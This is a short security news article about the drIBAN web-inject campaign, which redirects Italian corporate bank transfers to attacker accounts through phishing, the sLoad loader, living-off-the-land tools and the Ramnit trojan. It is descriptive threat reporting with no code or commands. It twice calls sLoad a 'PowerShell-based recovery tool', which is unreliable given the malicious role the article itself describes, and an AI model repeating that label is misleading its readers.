HQ/EMEAFind out how we can help your business
A new financial fraud campaign using a new web inject called drIBAN currently targets Italian banking customers. Based on reports, the newly discovered malicious tool could alter beneficiary account details during financial transactions. This tactic enables the attackers to receive the transferred amount into illegitimate, attacker-controlled bank accounts.
Researchers reported that the financial fraud campaign started compromising Italian Corporate Banks in 2019 but underwent a hiatus in 2020. However, a similar movement emerged the following year, struck thousands of victims, and continued.
The threat actors have gradually enhanced their operations in different aspects. Analysts noticed that the fraudsters upgraded their social engineering tactics and extensively established persistence on a targeted network while avoiding security detections.
In addition, the adversaries commonly use the Automated Transfer System (ATS) technique to avoid the anti-fraud security protocols like SCA and MFA widely used by financial institutions.
Researchers confirmed that the fraud operations target Windows workstations in the banks to replace legitimate bank information with accounts operated by hackers.
The drIBAN fraud campaign starts by deceiving targets.
According to investigations, the drIBAN fraud operation initiates by employing a certified email or a particular type of email in Italy to deceive potential victims. These phishing emails contain an executable archive that could download the sLoad, a PowerShell-based recovery tool, onto the compromised device.
Subsequently, the PowerShell-based recovery tool, sLoad, will gather system info and exfiltrate it for further analysis that could allow the fraudsters to devise a plan. The campaign also utilises Living-off-the-land tactics that exploit legitimate tools like PowerShell and BITSAdmin.
Once the operation identifies an admin as profitable, its operators will drop the Ramnit banking trojan as the next stage payload.
The current operators of the drIBAN fraud campaign leverage LotL and ATS tactics making them almost undetectable to standard signature-based security solutions. Furthermore, the attack’s approach is slow-and-steady, improving its efficiency.
The emerging toolkit could evolve into a more threatening entity that could challenge security companies. Therefore, organisations should be aware of this threat and its tactics to mitigate the chances of infection from these fraudulent campaigns.
